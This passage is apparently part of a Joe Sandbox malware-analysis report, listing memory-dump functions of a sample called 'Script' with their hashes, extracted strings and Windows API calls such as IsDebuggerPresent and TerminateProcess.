                                                                                    • Source File: 00000000.00000002.2391245033.00000000009A2000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2391173555.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9a0000_Script.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: KF@T$MaV%$P{mf$dT]^$g|i~$lOED$nrui$vLYY$vsHv
                                                                                    • API String ID: 0-1334427942
                                                                                    • Opcode ID: 25da8cb287d80a5293915a4b4a70ee19e78cd8353e16a26922fd5cc17555e8e2
                                                                                    • Instruction ID: 304b1bfcf6b7b22ee41db159b48ba2d9b0d33bead17d972fbf9956bf45cc4c64
                                                                                    • Opcode Fuzzy Hash: 25da8cb287d80a5293915a4b4a70ee19e78cd8353e16a26922fd5cc17555e8e2
                                                                                    • Instruction Fuzzy Hash: 428102B0504B818BE335CF36C5A07A3BFE2AFA2304F18896DD1EB4B246D7756805CB55
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: W-Fi$W-Fi$pL$F
                                                                                    • API String ID: 0-3784783616
                                                                                    • Opcode ID: 065daa14b9197cf31cd52b1462293ad7d15b981060723f0e887bd1e53d201dce
                                                                                    • Instruction ID: 1b764e95ecc3d39982ff07847943bb8cdf1144a96dec61eae6c519bd807c2c8a
                                                                                    • Opcode Fuzzy Hash: 065daa14b9197cf31cd52b1462293ad7d15b981060723f0e887bd1e53d201dce
                                                                                    • Instruction Fuzzy Hash: 42033236A406168FDB08CEBCC9E07DE77F3BB46350F108699D95ADB395C63A89499F00
                                                                                    APIs
                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6E0C1836
                                                                                    • IsDebuggerPresent.KERNEL32 ref: 6E0C1902
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6E0C1922
                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 6E0C192C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                    • String ID:
                                                                                    • API String ID: 254469556-0
                                                                                    • Opcode ID: 5bf53175df4019c4a68647c85b43b915ea251ed77abbfd89a1b336201012c6d1
                                                                                    • Instruction ID: 5e8555aef301f2ee26e1b07c5996c3ba6f4c8ff3cf7c35540aa5051c3489e59b
                                                                                    • Opcode Fuzzy Hash: 5bf53175df4019c4a68647c85b43b915ea251ed77abbfd89a1b336201012c6d1
                                                                                    • Instruction Fuzzy Hash: A2311475D45218DBDB50DFA4D989BCDBBB8BF08704F1041AAE409AB240EB719A89CF46
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2391245033.00000000009A2000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2391173555.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9a0000_Script.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 9$C$LO$\
                                                                                    • API String ID: 0-1645696869
                                                                                    • Opcode ID: 512af8a75a172f51a90c3f479bf44823de0cf5aa652ac4a438b759bc7c2491a6
                                                                                    • Instruction ID: 574a393ab9e7e7ad660d26c2ececb68106b2a9cf753806a0a01165005a55e2b7
                                                                                    • Opcode Fuzzy Hash: 512af8a75a172f51a90c3f479bf44823de0cf5aa652ac4a438b759bc7c2491a6
                                                                                    • Instruction Fuzzy Hash: 77322272A083059FD714CF24CC45B6BBBE6EF81314F188A2CE6959B391D778D905CB92
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2391245033.00000000009A2000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2391173555.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9a0000_Script.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: /0'4$7 ="$?,<+$zr
                                                                                    • API String ID: 0-467445832
                                                                                    • Opcode ID: 48af2d476ad165bb59db0bcba7f0037ae263570ab39bb39aefebd4ff2901fbaa
                                                                                    • Instruction ID: edae25533990bf79045b8ce4d655d1f0642abeed13484d83c1efa7fdf98425d1
                                                                                    • Opcode Fuzzy Hash: 48af2d476ad165bb59db0bcba7f0037ae263570ab39bb39aefebd4ff2901fbaa
                                                                                    • Instruction Fuzzy Hash: 69C1DDB19083848FD714DF24C865B6BBBE5EBD1304F14892DE1E28B2A2DB798505CB92
                                                                                    APIs
                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6E0C42B2
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6E0C42BC
                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6E0C42C9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                    • String ID:
                                                                                    • API String ID: 3906539128-0
                                                                                    • Opcode ID: 42e152e28913f7ddc6b6e324f740493a94ac9088f22afeb8a042975d77d2c6e8
                                                                                    • Instruction ID: fc1e4bbc23b51f51b8bcd9f3004cabe5429d6c2bd98d10398d08057badfe6475
                                                                                    • Opcode Fuzzy Hash: 42e152e28913f7ddc6b6e324f740493a94ac9088f22afeb8a042975d77d2c6e8
                                                                                    • Instruction Fuzzy Hash: 6D31E574901228ABCB61DFA4D988BCDBBB8BF08754F5045DAE41CA7250E7709F868F45
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(?,?,6E0C2FB4,?,00000001,?,?), ref: 6E0C2FD7
                                                                                    • TerminateProcess.KERNEL32(00000000,?,6E0C2FB4,?,00000001,?,?), ref: 6E0C2FDE
                                                                                    • ExitProcess.KERNEL32 ref: 6E0C2FF0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                    • String ID:
                                                                                    • API String ID: 1703294689-0
                                                                                    • Opcode ID: 31cfcbf740775a25bffcd78cdaa7bb3eca4edcea1da454c5748103922edb7aa9
                                                                                    • Instruction ID: e0aa5a79e3cca163489a2dd1843e8986437bc985c9d98e3a0f8174ec91552c0d
                                                                                    • Opcode Fuzzy Hash: 31cfcbf740775a25bffcd78cdaa7bb3eca4edcea1da454c5748103922edb7aa9
                                                                                    • Instruction Fuzzy Hash: 13E04631010948AFCF126BD0C85CA8C3B69FB06A85B214829F8088B530CB39D982DA82
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $u$$u
                                                                                    • API String ID: 0-3695857504
                                                                                    • Opcode ID: 3e69dbf21a881f328c49b20299db37937914aef611485624488f442dcc082ebe
                                                                                    • Instruction ID: 652f73cb2d160793e7e221e83ae752c2a827877f0a95b2fdf696e2fc5e0ae147
                                                                                    • Opcode Fuzzy Hash: 3e69dbf21a881f328c49b20299db37937914aef611485624488f442dcc082ebe
                                                                                    • Instruction Fuzzy Hash: 39322636B446428FDF048EBDD9A53CE77E3BB463A1F109615C921EB394D23B894D8728
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 2k"1$2k"1
                                                                                    • API String ID: 0-549873567
                                                                                    • Opcode ID: 677522ba2cf76cb6b27dbbd8bfb46aa92ebcf375630c36f1a4c86527c8731a5b
                                                                                    • Instruction ID: 2131d16aa12a4d8e367760f4119fdf05bc48fc3140ab35d3b66f1766ba97bedc
                                                                                    • Opcode Fuzzy Hash: 677522ba2cf76cb6b27dbbd8bfb46aa92ebcf375630c36f1a4c86527c8731a5b
                                                                                    • Instruction Fuzzy Hash: 7F0212B2A4C209DFDB04CEEDE5D13CD7BE2AB4A751F10921AE411FB654E2398885CB07
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2391245033.00000000009A2000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2391173555.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9a0000_Script.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Fl`b$J
                                                                                    • API String ID: 0-596997115
                                                                                    • Opcode ID: 9de58b24cb174ce1097b72d5b5c4a946fa47dfa1565ed6ce585bb8d19aa16a2f
                                                                                    • Instruction ID: 199a8bfd17837e250274ca073a342434c3bdecedb45f464f98f525bd88902021
                                                                                    • Opcode Fuzzy Hash: 9de58b24cb174ce1097b72d5b5c4a946fa47dfa1565ed6ce585bb8d19aa16a2f
                                                                                    • Instruction Fuzzy Hash: B081226150C3C28BD3098F2A846177BBFE5AFA7314F18999DE4D68B282D739C9098753
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2391245033.00000000009A2000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2391173555.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9a0000_Script.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 0A}$7A}
                                                                                    • API String ID: 0-3162706979
                                                                                    • Opcode ID: 612c47ff1980969a0b2af9e7f9725a76ffd723aefc8da033563ecb10ce4e51f3
                                                                                    • Instruction ID: da5ec72a54163e0003d000ca6ce1b847b279b5ef80a7780de33465eb6ccb9d90
                                                                                    • Opcode Fuzzy Hash: 612c47ff1980969a0b2af9e7f9725a76ffd723aefc8da033563ecb10ce4e51f3
                                                                                    • Instruction Fuzzy Hash: 70513976A0A2144BE724DB28CC51B3BBB92ABD5710F1D893CDAC65B391E632AC01C781
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2391245033.00000000009A2000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2391173555.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9a0000_Script.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: %*+($5|iL
                                                                                    • API String ID: 0-93752023
                                                                                    • Opcode ID: bf9ee9644c84447f19e2afa8307ff14c10b1eda46b94a14c148fb653dbbca3b8
                                                                                    • Instruction ID: 1378d029fefb65a7db291ac99544d1eda5cc2bd3e006fe88274fcf577a497ef6
                                                                                    • Opcode Fuzzy Hash: bf9ee9644c84447f19e2afa8307ff14c10b1eda46b94a14c148fb653dbbca3b8
                                                                                    • Instruction Fuzzy Hash: 36514372B553184BDB189E2CCC8277FBBA6ABC4714F19893DE985873A0EA74DC008791
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2391245033.00000000009A2000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2391173555.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9a0000_Script.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$onml
                                                                                    • API String ID: 0-1065360365
                                                                                    • Opcode ID: 8ae999830ec717f49a82289dd289547bd6bfe90c4bafcc332308c5025d90304c
                                                                                    • Instruction ID: a06dc4d01ae3f56619c369fc83a8bb52236a1558152b42fc0d3b786ff7e0e242
                                                                                    • Opcode Fuzzy Hash: 8ae999830ec717f49a82289dd289547bd6bfe90c4bafcc332308c5025d90304c
                                                                                    • Instruction Fuzzy Hash: E84123B09083058BD714CF24E88976BBBF1FF95328F14862CE899573E1E7359918CB82
                                                                                    APIs
                                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6E0CA83C,?,?,00000008,?,?,6E0CA4D4,00000000), ref: 6E0CAA6E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionRaise
                                                                                    • String ID:
                                                                                    • API String ID: 3997070919-0
                                                                                    • Opcode ID: 35940a4b3b5a6a4231d36fe93adfef95fbcb602c59164644e5af91f2cdc56902
                                                                                    • Instruction ID: 7370df7f2cb3bdf56faadbd5f903987975d728d1eb2ebfcc90b9953ea4854dee
                                                                                    • Opcode Fuzzy Hash: 35940a4b3b5a6a4231d36fe93adfef95fbcb602c59164644e5af91f2cdc56902
                                                                                    • Instruction Fuzzy Hash: F2B16831610609CFD705CF68C496B997BF0FF457A4F258658E8AACF2A1C335E982CB42
                                                                                    APIs
                                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6E0C1A0E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd
                                                                                    Similarity
                                                                                    • API ID: FeaturePresentProcessor
                                                                                    • String ID:
                                                                                    • API String ID: 2325560087-0
                                                                                    • Opcode ID: 8ba7137eb37567aced3ef4b6f10c00906a6178b595c2fe9ac59707445f9ef13d
                                                                                    • Instruction ID: c4e84852f05798afe8029d613928c32f744d4c66384a844ce3ed836fe07a7748
                                                                                    • Opcode Fuzzy Hash: 8ba7137eb37567aced3ef4b6f10c00906a6178b595c2fe9ac59707445f9ef13d
                                                                                    • Instruction Fuzzy Hash: 34519CB1A05A0A8FDB04CF95C5927DEBBF1FB48740F20896AD425EB640E3B59A44CF91
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2b29ed12fce9aa9f08b682eaacb3508a8996d53fff1349b60f555798d2238a3a
                                                                                    • Instruction ID: d243f94157672215098855371db6f716008f8ceded665639e312880452056c75
                                                                                    • Opcode Fuzzy Hash: 2b29ed12fce9aa9f08b682eaacb3508a8996d53fff1349b60f555798d2238a3a
                                                                                    • Instruction Fuzzy Hash: 02418271804229AEDB60CFA9CC98BEEBBB9FB45744F1442D9E41DD3210DB309E858F11
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2391245033.00000000009A2000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2391173555.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9a0000_Script.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ,
                                                                                    • API String ID: 0-3772416878
                                                                                    • Opcode ID: 15580e2362fddfaf6b891e5e6c3d002be01ea6c7b7f2a95b696f181195c89938
                                                                                    • Instruction ID: cd79d6ffcfc81d7e8886f30870bb71ddfbe4c7f30336d03e21ed7676914fb278
                                                                                    • Opcode Fuzzy Hash: 15580e2362fddfaf6b891e5e6c3d002be01ea6c7b7f2a95b696f181195c89938
                                                                                    • Instruction Fuzzy Hash: ABB125705083819FD325CF58C884B1BBBE0ABA9704F484E6DE5D997742D671EA08CBA7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2391245033.00000000009A2000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2391173555.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9a0000_Script.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 0
                                                                                    • API String ID: 0-4108050209
                                                                                    • Opcode ID: d163aec54173df24b95285374a16abe607d0d47f233b922b8a9f097740168f70
                                                                                    • Instruction ID: ef1c1b701a3e0749200e8e28bdf7c286a3903ad4bc131f551bc08b42c7669d82
                                                                                    • Opcode Fuzzy Hash: d163aec54173df24b95285374a16abe607d0d47f233b922b8a9f097740168f70
                                                                                    • Instruction Fuzzy Hash: FC716637A0D6C18BCB164F3D4C803A9AB5B5BA7330F2D83A9D9B14B3D5C5298D0693A1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2391245033.00000000009A2000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2391173555.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9a0000_Script.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: d
                                                                                    • API String ID: 0-2564639436
                                                                                    • Opcode ID: 2d5457a68068f78a5f2142b8b1da015c19f7191c5f11cb42fc5ed4a8ffc9878c
                                                                                    • Instruction ID: 3b36df40efc844a3236ad4f98b30e62a95ebf05eef3e5930559b3a37d49224ff
                                                                                    • Opcode Fuzzy Hash: 2d5457a68068f78a5f2142b8b1da015c19f7191c5f11cb42fc5ed4a8ffc9878c
                                                                                    • Instruction Fuzzy Hash: C651583AB097D487D7248E7C5C513FA7A935BD3330B2C8B69D6F1873D2C66988059350
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd
                                                                                    Similarity
                                                                                    • API ID: HeapProcess
                                                                                    • String ID:
                                                                                    • API String ID: 54951025-0
                                                                                    • Opcode ID: 038c4164ad9f5a4fa2d58d82830172a17cd82812525c64f4f9e846feede5d8f1
                                                                                    • Instruction ID: 918bf5b03419fd0afbe61d8d1172ca231d1b2bfa7569b5421f88234c88f1aa59
                                                                                    • Opcode Fuzzy Hash: 038c4164ad9f5a4fa2d58d82830172a17cd82812525c64f4f9e846feede5d8f1
                                                                                    • Instruction Fuzzy Hash: FAA012301095008B5B008E3282892493694590758031940145404C4100DA3041D0A640
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8a3c6a0b783ffe41674a4f987e725bab78ba05c1488a7cd6d10d6939039463a3
                                                                                    • Instruction ID: f74bfe7596435fc2dce68ce166d3ae671f283c8bf092bf1b0a4f8b4592cb6246
                                                                                    • Opcode Fuzzy Hash: 8a3c6a0b783ffe41674a4f987e725bab78ba05c1488a7cd6d10d6939039463a3
                                                                                    • Instruction Fuzzy Hash: 71E13A72A405068FDF04CEBCC9E57CE7BE3BB56360F149615E825EB7A4D23A49098B24
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2391245033.00000000009A2000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2391173555.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9a0000_Script.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9c544058c042142eec911dc442bbc40fa8a5ec4ea9dc4747f6eeafae185af192
                                                                                    • Instruction ID: 29c6a718bccfc9637380468e9e024081fc6ff9fa86839c2e2b10bae513239036
                                                                                    • Opcode Fuzzy Hash: 9c544058c042142eec911dc442bbc40fa8a5ec4ea9dc4747f6eeafae185af192
                                                                                    • Instruction Fuzzy Hash: AEC1A07FC7C382CED7014BB490D62E6BF61E923A2537886EAD0920B907CB17854BD6D5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2391245033.00000000009A2000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2391173555.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9a0000_Script.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4d59ae57b75723e8a473194b8e416ac06099e004d1962a89c02b3fa77ce27d34
                                                                                    • Instruction ID: eb3739e4f882fde7c86eb9c48078c8a25d9ee7fd6ec4886adcc5f3a9386954dd
                                                                                    • Opcode Fuzzy Hash: 4d59ae57b75723e8a473194b8e416ac06099e004d1962a89c02b3fa77ce27d34
                                                                                    • Instruction Fuzzy Hash: 74913732A042A14FC726CE29C84076ABB91AB95364F29C67DE8F99B3D2D774CC45C7C1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2391245033.00000000009A2000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2391173555.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9a0000_Script.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9ceae4855dbdb8447090e5a448d543eb439c8690a93fc83ffaefa46ea59212ad
                                                                                    • Instruction ID: 52df5776b1ea3747fb589d3e8b2e0e4633f4539c3b0e65eb0898ee2c49766692
